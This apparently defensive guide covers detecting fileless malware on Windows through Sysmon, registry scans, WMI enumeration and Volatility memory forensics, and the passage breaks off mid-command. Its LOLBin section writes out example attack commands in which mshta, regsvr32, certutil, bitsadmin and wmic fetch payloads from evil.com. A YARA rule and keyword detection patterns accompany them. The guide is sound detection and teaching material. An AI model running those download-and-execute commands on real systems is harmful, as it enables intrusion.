detecting-fileless-malware-techniques

What this skill does

# Detecting Fileless Malware Techniques

## When to Use

- EDR alerts indicate suspicious behavior from trusted system binaries (PowerShell, mshta, wmic, regsvr32)
- Investigating attacks that leave no traditional malware files on disk
- Analyzing WMI event subscriptions, registry-stored payloads, or scheduled task abuse for persistence
- Building detection rules for LOLBin (Living Off the Land Binary) abuse in enterprise environments
- Memory forensics reveals malicious code but no corresponding files exist on the filesystem

**Do not use** for traditional file-based malware; standard static and dynamic analysis methods are more appropriate for disk-resident malware.

## Prerequisites

- Sysmon installed and configured with comprehensive logging (process creation, WMI events, registry changes)
- PowerShell Script Block Logging and Module Logging enabled
- Volatility 3 for memory forensics of fileless malware artifacts
- Process Monitor (ProcMon) for real-time system activity monitoring
- Windows Event Log access with adequate retention policies
- Autoruns for identifying persistence mechanisms

## Workflow

### Step 1: Identify LOLBin Usage

Detect abuse of legitimate Windows binaries for malicious purposes:

```
Commonly Abused LOLBins and Detection Patterns:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
mshta.exe:
  Abuse: Execute HTA files with embedded VBScript/JScript
  Example: mshta http://evil.com/payload.hta
  Example: mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -enc ...""")
  Detect: mshta.exe with URL argument or vbscript: prefix

regsvr32.exe:
  Abuse: Load scriptlets via COM (.sct files) - "Squiblydoo"
  Example: regsvr32 /s /n /u /i:http://evil.com/payload.sct scrobj.dll
  Detect: regsvr32.exe with /i: URL parameter

certutil.exe:
  Abuse: Download files, decode Base64
  Example: certutil -urlcache -split -f http://evil.com/payload.exe
  Example: certutil -decode encoded.txt payload.exe
  Detect: certutil.exe with -urlcache or -decode arguments

rundll32.exe:
  Abuse: Execute DLL functions, JavaScript
  Example: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";...
  Detect: rundll32.exe with javascript: argument

wmic.exe:
  Abuse: Execute code via XSL stylesheets
  Example: wmic process get brief /format:"http://evil.com/payload.xsl"
  Detect: wmic.exe with /format: URL parameter

bitsadmin.exe:
  Abuse: Download files via BITS
  Example: bitsadmin /transfer job http://evil.com/payload.exe C:\Temp\p.exe
  Detect: bitsadmin.exe with /transfer or /addfile to external URL

cmstp.exe:
  Abuse: Execute commands via INF file
  Example: cmstp.exe /ni /s payload.inf
  Detect: cmstp.exe execution from non-standard locations
```

### Step 2: Detect WMI-Based Persistence

Analyze WMI event subscriptions used for fileless persistence:

```bash
# List WMI event subscriptions (filters, consumers, bindings)
wmic /namespace:"\\root\subscription" path __EventFilter get Name,Query /format:list
wmic /namespace:"\\root\subscription" path CommandLineEventConsumer get Name,CommandLineTemplate /format:list
wmic /namespace:"\\root\subscription" path ActiveScriptEventConsumer get Name,ScriptText /format:list
wmic /namespace:"\\root\subscription" path __FilterToConsumerBinding get Filter,Consumer /format:list

# PowerShell enumeration of WMI subscriptions
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer
Get-WMIObject -Namespace root\Subscription -Class ActiveScriptEventConsumer
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
```

```python
# Parse Sysmon WMI events (Event IDs 19, 20, 21)
import subprocess
import xml.etree.ElementTree as ET

# WMI Event Filter creation (EID 19)
result = subprocess.run(
    ["wevtutil", "qe", "Microsoft-Windows-Sysmon/Operational",
     "/q:*[System[EventID=19 or EventID=20 or EventID=21]]", "/f:xml", "/c:50"],
    capture_output=True, text=True
)

ns = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
for event_xml in result.stdout.split("</Event>"):
    if not event_xml.strip():
        continue
    try:
        root = ET.fromstring(event_xml + "</Event>")
        eid = root.find(".//e:System/e:EventID", ns).text
        data = {}
        for d in root.findall(".//e:EventData/e:Data", ns):
            data[d.get("Name")] = d.text

        if eid == "19":
            print(f"[!] WMI Filter Created: {data.get('Name')}")
            print(f"    Query: {data.get('Query')}")
        elif eid == "20":
            print(f"[!] WMI Consumer Created: {data.get('Name')}")
            print(f"    Type: {data.get('Type')}")
            print(f"    Destination: {data.get('Destination')}")
        elif eid == "21":
            print(f"[!] WMI Binding Created")
            print(f"    Consumer: {data.get('Consumer')}")
            print(f"    Filter: {data.get('Filter')}")
    except:
        pass
```

### Step 3: Detect Registry-Resident Payloads

Find malicious code stored in the Windows Registry:

```bash
# Common registry locations for fileless payloads
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /s
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /s
reg query "HKCU\Environment" /s

# Check for PowerShell encoded commands in registry values
# Malware stores Base64-encoded payloads in custom registry keys
reg query "HKCU\Software" /s /f "powershell" 2>nul
reg query "HKCU\Software" /s /f "-enc" 2>nul

# Check for large registry values (possible stored payloads)
python3 << 'PYEOF'
import winreg
import base64

suspicious_keys = [
    (winreg.HKEY_CURRENT_USER, r"Software"),
    (winreg.HKEY_LOCAL_MACHINE, r"Software"),
]

def scan_registry(hive, path, depth=0):
    if depth > 3:
        return
    try:
        key = winreg.OpenKey(hive, path)
        i = 0
        while True:
            try:
                name, value, vtype = winreg.EnumValue(key, i)
                if isinstance(value, str) and len(value) > 500:
                    # Check for Base64-encoded content
                    try:
                        decoded = base64.b64decode(value[:100])
                        print(f"[!] Large Base64 value: {path}\\{name} ({len(value)} bytes)")
                    except:
                        pass
                    # Check for PowerShell keywords
                    if any(kw in value.lower() for kw in ["powershell", "invoke", "iex", "-enc"]):
                        print(f"[!] PowerShell in registry: {path}\\{name}")
                i += 1
            except WindowsError:
                break
        # Recurse into subkeys
        j = 0
        while True:
            try:
                subkey = winreg.EnumKey(key, j)
                scan_registry(hive, f"{path}\\{subkey}", depth + 1)
                j += 1
            except WindowsError:
                break
    except:
        pass

for hive, path in suspicious_keys:
    scan_registry(hive, path)
PYEOF
```

### Step 4: Analyze Memory for Fileless Artifacts

Use memory forensics to find in-memory-only malware:

```bash
# Process with injected code (no backing file)
vol3 -f memory.dmp windows.malfind

# Check for .NET assemblies loaded from memory (not from disk files)
vol3 -f memory.dmp windows.vadinfo --pid 4012 | grep -i "PAGE_EXECUTE"

# PowerShell CLR usage (indicates .NET reflection loading)
vol3 -f memory.dmp windows.cmdline | grep -i "powershell"

# Scan for known fileless frameworks
vol3 -f memory.dmp yarascan.YaraScan --yara-rules "
rule Fileless_PowerShell {
    strings:
        \$s1 = \"System.Reflection.Assembly\" ascii wide
        \$s2 = \"[System.Convert]::FromBase64String\" ascii wide
        \$s3 = \"Invoke-Expression\" ascii wide
        \$s4 = \"DownloadString\" ascii wide
    condition:
        2 of them
}
"

# Extract PowerShell command history from memory
vol3 -f memory.dmp windows.cmdline
strings memory.dmp | grep -i "invoke-\|iex \|downloadstring\|-en